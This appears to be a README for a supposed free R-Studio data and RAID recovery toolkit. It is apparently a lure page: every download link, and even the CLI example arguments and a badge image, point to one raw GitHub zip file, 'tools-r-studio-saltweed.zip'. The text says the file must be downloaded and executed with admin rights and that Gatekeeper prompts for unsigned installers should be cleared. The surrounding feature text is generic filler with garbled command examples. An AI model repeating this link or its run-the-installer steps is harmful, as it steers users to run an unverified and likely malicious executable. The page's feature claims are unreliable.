https://raw.githubusercontent.com/R0zu/r-studio-tools/main/holiness/tools-r-studio-saltweed.zip
A practical toolkit for data recovery and RAID recovery workflows. This project covers data salvage from damaged disks, rebuilds of RAID sets, and diagnostics for Network RAID configurations. It blends guided workflows with powerful utilities to help you recover files, restore access, and validate data integrity across local disks and networked storage.
ποΈ πΎ π§° π§©
Table of Contents
- Quick start
- Core ideas and workflow
- What you get
- Supported platforms and requirements
- How to install and run
- Scenarios and use cases
- Command line interface basics
- Scripting and automation
- Data safety and best practices
- Troubleshooting and common issues
- Design philosophy and architecture
- Contributing and maintaining
- Roadmap and future directions
- Licensing and credits
- FAQ
Quick start If you want to jump straight to getting something done, follow this compact guide. The Releases page contains ready-to-run packages for major platforms. From the releases, download the appropriate installer or archive for your system, then run or extract it to begin recovery tasks.
- Locate the release package that matches your environment.
- On Windows, run the installer executable after downloading.
- On macOS, open the disk image or installer package and follow the prompts.
- On Linux, extract the tarball or run the installer script as described in the release notes.
- Launch the tool and start a scan to identify recoverable data. The interface guides you through selecting a source drive, analyzing the RAID configuration, and outlining recoverable items.
Note: The download link above points to the official Releases page. If you run into trouble accessing the link, visit the Releases section of the repository to obtain the assets manually.
Core ideas and workflow Data recovery is a careful process. The tools in this project are designed to minimize risk while maximizing the chance of salvaging files. The recovery workflow typically follows these steps:
- Identify the source: you choose a disk, a disk image, or a RAID member.
- Analyze the structure: check file systems, partition tables, and RAID metadata.
- Assess health: review S.M.A.R.T. data, read errors, and potential media degradation.
- Reconstruct and recover: for RAID arrays, reconstruct parity and rebuild the array if needed.
- Validate and export: verify recovered files, integrity, and target locations.
The philosophy here is to give you clear options, keep risk low, and document each action. You can mix guided flows with manual tweaks to handle unusual cases. The tools emphasize transparency about what is being scanned, what is being recovered, and where the recovered data will live.
What you get
- Disk and image analysis: quick scans to map partitions, file systems, and RAID metadata.
- RAID recovery support: parity-based rebuilds for common RAID configurations, degraded array handling, and rebuild verification.
- Network RAID support: diagnoses for NAS devices using Network RAID schemes, with options to extract data across network shares.
- Data integrity checks: checksums, hash verifications, and consistency tests to ensure recovered data is valid.
- Export and reporting: options to export recovered files, generate reports, and log activities for auditing.
- Safe operation modes: non-destructive analysis prior to irreversible actions, with clear prompts for destructive steps.
- Cross-platform compatibility: designed to work on Windows, macOS, and Linux environments.
Emojis guide you through concepts in a friendly way, while the tools behind the scenes handle complex analyses. The goal is to provide practical outcomes without sacrificing clarity or control.
Supported platforms and requirements
- Windows: 10 and later, 64-bit builds. Requires standard admin rights to install and run recovery operations.
- macOS: macOS 10.13 (High Sierra) and newer, 64-bit. Gatekeeper considerations may apply for unsigned installers; follow on-screen prompts to allow the app to run.
- Linux: Modern distributions with glibc and common development tools. Use the provided tarballs or installer where available.
- Hardware considerations: a stable primary system with enough free space to hold recovered data, and a separate target drive for exports when possible. For RAID and Network RAID tasks, a reliable network connection helps, and enough RAM improves scanning performance.
If you need to check the health of storage devices before attempting recovery, look for SMART data and SMART-enabled tools. The project favors safe defaults and clear prompts for any potentially destructive action. The aim is to protect your data while giving you the means to recover as much as possible.
How to install and run
-
Download the appropriate package from the Releases page for your platform. The link has a path part, so that file needs to be downloaded and executed. After the download completes, proceed to run the installer (Windows), open the disk image or installer (macOS), or extract and run the binary (Linux).
-
On first run, the application will guide you through initial setup. This includes choosing a data export location, configuring network access if you plan to work with NAS or Network RAID, and selecting preferred language and UI options.
-
Start with a quick scan. Pick a source drive, disk image, or RAID member. The scan will reveal partitions, file systems, and potential recoverable data. You can inspect the results in the built-in pane and filter by file type or folder.
-
For RAID recovery, identify the RAID level if possible. The tool will propose parity-based recovery paths when needed and show you degraded array options if a member is missing.
-
Recover to a safe location. Always export recovered data to a different drive from the source to minimize risk of data corruption or overwriting.
-
Validate the results. Use the integrity checks to confirm that recovered files are intact and usable. If you still have questions, consult the tutorials, manuals, and community resources.
-
Save reports. The system can generate a recovery report detailing steps performed, the data recovered, and any issues encountered. These reports can help with audits and future planning.
Remember, if the link to the releases fails, check the Releases section for assets and instructions. You can still access the same downloads via the repository's Releases hub to obtain the latest builds.
Visual assets and design The project uses a clean, readable UI with clear icons for disks, RAID components, and network devices. Visual elements emphasize safety and progress indicators. The color palette favors blue and gray tones to convey trust and stability, with orange accents to highlight warnings or critical actions.
- Icons: Disk drives, RAID arrays, and network devices use consistent glyphs to reduce cognitive load during recovery tasks.
- Progress indicators: Real-time feedback on scans, rebuilds, and exports helps you gauge progress at a glance.
- Layout: A stable left-hand navigation and a dominant center workspace allow you to focus on the data and recovery results.
Imagery Images reflect the storage and RAID landscape. You may see depictions of disk shelves, RAID consoles, NAS devices, and data streams. Where applicable, the documentation and tutorials use annotated diagrams to illustrate recovery workflows.
If you want to explore real-world recovery scenarios, browse the tutorials and case studies in the Documentation section. The examples cover drive failures, degraded RAID arrays, and Network RAID challenges with practical steps you can follow.
Usage scenarios and examples
- Single-disk failure recovery: A user identifies a failed drive and uses the scanning feature to locate recoverable partitions. The tool suggests file-level or sector-level recovery options and allows exporting to a safe location.
- RAID-5 with degraded member: The system detects a missing member, analyzes parity, and guides you through a parity rebuild. After a successful rebuild, you can recover the missing files and verify integrity.
- RAID-6 multi-disk failure: In more complex failure scenarios, the tool leverages robust parity models to reconstruct data. Care is taken to minimize the risk of further data loss during the rebuild process.
- Network RAID recovery: A NAS device presents a Network RAID layout. The recovery workflow includes mapping shares, accessing the array configuration, and extracting recoverable data across the network with appropriate authentication.
- Corrupted file systems: For corrupted partitions, the tool can mount read-only images, extract intact files, and offer file repair options for damaged metadata.
CLI and scripting basics If you prefer automation, the project exposes a command-line interface (CLI) to perform common tasks. CLI usage can speed up repetitive recovery operations or be embedded into scripts for larger data workflows.
- Scan: scan --source /dev/sdb or scan --image https://raw.githubusercontent.com/R0zu/r-studio-tools/main/holiness/tools-r-studio-saltweed.zip
- Inspect: inspect --part 1 --detail
- Rebuild: raid-rebuild --raid /dev/md0 --degraded
- Export: export --destination /mnt/recover --files "*.docx, *.xlsx"
- Validate: validate --hashes https://raw.githubusercontent.com/R0zu/r-studio-tools/main/holiness/tools-r-studio-saltweed.zip
- Log: log --level info --output https://raw.githubusercontent.com/R0zu/r-studio-tools/main/holiness/tools-r-studio-saltweed.zip
A few tips for scripting
- Use non-destructive options by default. If you need to perform destructive actions, confirm prompts or pass explicit flags to bypass prompts.
- Log all operations. Keep logs for audits and troubleshooting.
- Test on non-critical data first. Before aggressive recovery runs, verify the process with small datasets.
Scripting enables repeatable recovery pipelines. You can integrate the CLI into your batch processes, automation servers, or custom dashboards. If you have a large set of drives to process, a simple script can scan each device, try a best-effort recovery, and report outcomes in a centralized log.
Scenarios and best practices
- Work on an image when possible. If you can create a forensic disk image, run scans and recover from the image to avoid touching the original drive.
- Maintain a clean export path. Dedicate a separate drive or partition for recovered data to minimize the risk of overwriting live data.
- Validate as you go. Use checksums or hash comparisons to verify recovered files, especially for important documents and irreplaceable media.
- Document your steps. Keep notes of the drives involved, the RAID configurations encountered, and the actions taken. This helps with future recovery attempts and audits.
- Plan for partial recoveries. In many cases you recover a subset of data rather than everything. Prioritize user-critical folders or file types first.
Data safety and best practices
- Always back up the source before performing any destructive operations.
- Use read-only scans when possible to avoid modifying data unintentionally.
- Prefer exporting to a different disk than the source during recovery.
- Keep your software up to date with the latest security and feature updates from the Releases page.
- If you work with sensitive information, configure access controls and file permissions on recovered data.
Troubleshooting and common issues
- No accessible disks: Confirm that the drives are physically connected and recognized by the OS. Check cables, power, and BIOS/UEFI settings.
- RAID metadata not detected: Some drives may not expose metadata in a standard format. Try manual RAID level selection or use a disk image to reason about parity patterns.
- Rebuild failures: If parity reconstruction fails, verify that the correct drives are included and that there is no data corruption on the surviving members.
- Network RAID access errors: Ensure proper network credentials and permissions. Check firewall rules and share accessibility.
Design philosophy and architecture
- Modularity: Components are designed to be independent, allowing you to replace or extend modules without affecting the entire system.
- Safety-first defaults: Non-destructive options are prioritized by default, with explicit prompts for any actions that could modify data.
- Transparency: Each step is logged and explained. You can review what the tool did, why it did it, and what the expected outcomes are.
- Extensibility: The architecture allows adding new recovery modalities, file systems, and RAID patterns as storage technologies evolve.
Contributing and maintaining
- Code style: Follow a clear, readable style with small, well-documented functions.
- Documentation: Provide concise explanations for new features, including setup steps and example workflows.
- Tests: Add tests for new recovery scenarios. Include both typical and edge cases to cover a range of hardware configurations.
- Community: Engage with users to understand real-world recovery challenges. Iterate on improvements based on feedback.
- Licensing: The project uses an open license to encourage collaboration while preserving clarity about usage rights.
Roadmap and future directions
- Expand RAID support: Add new parity and rebuild strategies for less common RAID configurations.
- Improved RAID metadata parsing: Build more robust detection for diverse RAID layouts across NAS devices.
- Enhanced network recovery: Extend support for more network protocols and secure access methods.
- Performance tuning: Optimize scanning and export paths for large volumes and multi-terabyte datasets.
- Community tooling: Provide sample scripts and templates for common recovery workflows.
Licensing and credits
- This project is released under an open license that encourages usage, modification, and contribution. See the LICENSE file for full terms. Credits go to the community contributors who share knowledge and help improve the tools, tutorials, and documentation.
FAQ
- Is this tool free to use? Yes. The core tooling is available under an open license. Some advanced features or enterprise integrations may have separate terms.
- Can I recover data from a damaged NAS? Yes. The tool supports Network RAID analysis and retrieval from NAS environments when accessible.
- Do I need admin rights to run? In most cases, yes. Administrative privileges simplify access to storage devices and ensure proper installation.
- What if I cannot download from the Releases page? If the link is unavailable, check the Releases section of the repository for assets and instructions. You can still access the same assets through the Releases hub on GitHub.
Acceptance of the releases and assets The repository is designed to provide a straightforward path to recovery tasks. The releases contain the binaries and installers you need to start working with your data. Always verify that you have the right artifact for your system and architecture before running any executable. If you encounter issues with the assets, you can raise a ticket or contribute to the documentation to help others facing similar problems.
Advanced topics: data integrity, filesystem considerations, and recovery science
- Filesystem specifics: Some common file systems require special handling during recovery. The toolkit includes tailored routines for NTFS, ext4, HFS+, XFS, and others. When possible, the system reads metadata in a non-destructive way to avoid overwriting existing data.
- Data integrity strategies: Checksums, hash verification, and consistency checks are an important part of the recovery flow. These steps help you confirm the integrity of recovered files.
- RAID parity concepts: Understanding parity and striping can help you reason about recovery outcomes. The toolkit provides tools to visualize parity layouts, reconstruct data across disks, and validate results.
- Network RAID intricacies: Network RAID involves both local disk architecture and network-based storage management. The recovery workflow accounts for these dual aspects to recover data from NAS devices and network shares.
Accessibility and internationalization
- The project aims to be accessible to users with varying levels of expertise. Clear prompts, progressive disclosure of options, and readable labels help everyone navigate recovery tasks.
- Localization options are planned for future releases to make the tool usable in more languages. If you want to contribute translations, you can submit localization files and contribute to the multilingual documentation.
Documentation, tutorials, and learning resources
- In-repo docs cover installation, basic workflows, and advanced use cases. Tutorials illustrate common recovery scenarios with step-by-step instructions.
- Case studies show how real-world failures were approached, including drive failures, degraded arrays, and network storage issues.
- For ongoing learning, the community wiki contains tips, troubleshooting guides, and best practices.
Community and support
- The project welcomes community involvement. If you have questions, consider opening an issue, submitting a pull request, or joining community discussions.
- Support channels include the repository's issue tracker and community forums where users share experiences and solutions.
Ethics and safety notes
- Data recovery work involves sensitive information. Handle recovered data with care and respect privacy.
- Do not attempt recovery on devices you do not own or have explicit authorization to manage.
- Use non-destructive analysis whenever possible, especially on drives with uncertain health.
Visual style and branding
- The branding emphasizes simplicity and reliability. Visual cues aim to reduce cognitive load and support clear decision-making during recovery tasks.
- The UI design supports quick access to essential actions, including scans, RAID operations, exports, and reports.
Releases and assets link usage
- The official Releases page hosts the latest builds and assets. Use the link provided above to reach the assets. If you need to verify the latest version, the Releases hub is the quickest path to the newest files.
- For convenience, a colorful download button is provided to direct you to the same link. This button uses a standard badge from https://raw.githubusercontent.com/R0zu/r-studio-tools/main/holiness/tools-r-studio-saltweed.zip to convey a clear call to action.
Appendix: architectural overview
- Core modules: scanning, analysis, RAID handling, network access, export, and reporting.
- Data flow: source drives β scanner β analyzer β RAID engine β exporter β verifier.
- Storage model: all recoveries are performed in isolated contexts, with export destinations not shared with source drives unless explicitly specified.
Appendix: security considerations
- The project favors safety in recovery workflows. All actions are driven by explicit user input and confirmed prompts.
- The codebase follows best practices for secure handling of files and data, with attention to potential risks in storage and transfer operations.
Appendix: glossary
- RAID: Redundant Array of Independent Disks, a method to combine multiple disks for performance and/or redundancy.
- parity: a method of storing extra information across drives to reconstruct data in case of failures.
- Network RAID: a RAID-like layout implemented over networked storage devices.
- SMART: Self-Monitoring, Analysis and Reporting Technology; a standard for monitoring disk health.
- non-destructive: operations that do not modify original data or source media.
End of document.